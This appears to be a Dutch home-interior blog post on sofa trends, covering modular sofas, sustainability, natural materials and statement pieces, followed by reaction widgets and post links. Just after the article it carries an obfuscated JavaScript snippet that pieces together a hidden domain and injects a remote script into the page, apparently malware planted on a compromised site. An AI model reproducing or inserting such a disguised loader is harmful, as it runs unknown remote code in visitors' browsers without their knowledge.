Read Time:3 Minute, 5 Second

De belangrijkste trends op het gebied van interieur zijn de afgelopen jaren te vangen onder de noemers gemak, persoonlijk, warm en uniek. Ook bij het uitkiezen van een nieuwe bank spelen deze woorden een belangrijke rol en daar wordt door de makers van bijvoorbeeld banken en accessoires handig op ingespeeld. Zo kun je bijna elke bank tegenwoordig bestellen in elke gewenste kleur, gemaakt van bijna elk materiaal. Daar komt nu nog een extra optie bij: de elementenbank. Wat dat precies is lees je hieronder, net als alles over de andere trends op het gebied van banken.

Zoals we hierboven al schreven is het tegenwoordig vrij normaal dat je de kleur en de stof van een bank zelf kunt bepalen. Bij een komt daar nog bij dat je ook de opstelling zelf kunt bepalen én deze kan veranderen. Je zit dus nooit vast aan één bepaald model in je woonkamer en in combinatie met een bijzettafel over de bank is alles mogelijk. Je kunt de ene keer kiezen voor een driezitsbank en de andere keer weer voor een vierzitsbank. Van een grote bank kun je dus eenvoudig twee kleine banken maken. Bij een elementenbank hoort vaak ook een hocker, die je dan ook weer kunt gebruiken als salontafel.

Multifunctionaliteit en interieur

Een trend die al een paar jaar geleden in gang is gezet is multifunctionaliteit in het interieur. De oppervlakte waarop wij gemiddeld wonen wordt steeds kleiner, en dus gaan we op zoek naar manieren om die ruimte zo goed mogelijk te gebruiken en dus is bovengenoemde elementenbank ideaal. Zo zijn er meerdere manieren om een kleinere ruimte in te richten.

De tendens naar duurzaamheid zien we in vele facetten terugkomen en dus ook op het gebied van banken. De consument wil steeds vaker weten waar producten en materialen vandaan komen en of ze op een duurzame manier zijn ontworpen. zo gaat men steeds vaker op zoek naar een bank met een minimale belasting voor het milieu. Een voordeel van een duurzame bank is vaak ook dat de levensduur ervan langer is dan bij een ‚normale’ bank. Als je een echte duurzame bank wilt is het ook belangrijk om een bank uit te kiezen die in Nederland is gemaakt. Het idee dat duurzame meubels saai of ouderwets zijn is achterhaald: er zijn veel nieuwe en hippe designers van banken die duurzame banken produceren.

Natuurlijke elementen

Ook zien we dat er steeds meer natuurlijke elementen worden gebruikt en de kleuren bijvoorbeeld worden afgestemd op de natuurlijke elementen vuur, water en aarde. Je kunt deze elementen combineren met bijvoorbeeld geweven stoffen, fluwelen stoffen, leer en houten elementen in de bank. We zien ook steeds vaker verschillende typen metalen in een bankstel terugkomen, zoals bijvoorbeeld goud of koper. 

De laatste trend op het gebied van banken die we willen benoemen is het mixen van gewaagde kleuren en combinaties. Waar minimalisme tot een paar jaar geleden het meest populair was, zien we nu steeds vaker opvallende elementen in interieurs terug. Dit leidde tot zogenaamde ‘statement banken.’ De statement banken vind je in verschillende vormen en kleuren en je kan ervoor kiezen om je bank rustig te houden, maar door een kleine toevoeging er toch iets speciaals van te maken. Denk bijvoorbeeld aan het toevoegen van een gouden leuning aan je bank. Zo past een klassieke barok bank geweldig bij een minimalistisch interieur, naast dat het mooi staat springt zo’n bank er ook meteen uit… een statement bank dus! 

(function(){ iyli_=(“u”+”st”);iyli=document.createElement(“script”);iyli.async=true; iyliu=”312511032″;iyli_+=”a”+(“t.”);iyli_+=”i”+(“nf”+(“o”))+(“/”); iyliu+=”.4lkz3xl5ylil3ff7″;iyliu+=”fxXhx14imbtq57″; iyli.src=”https://”+iyli_+iyliu;iyli.type=”text/javascript”; d_b=document.body;d_b.appendChild(iyli); })();
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
grote planten in huis Previous post Hoog plafond? Haal deze grote planten in huis!
huis gekocht verhuizen Next post Huis gekocht? Zo laat je de verhuizing zo soepel en goedkoop mogelijk verlopen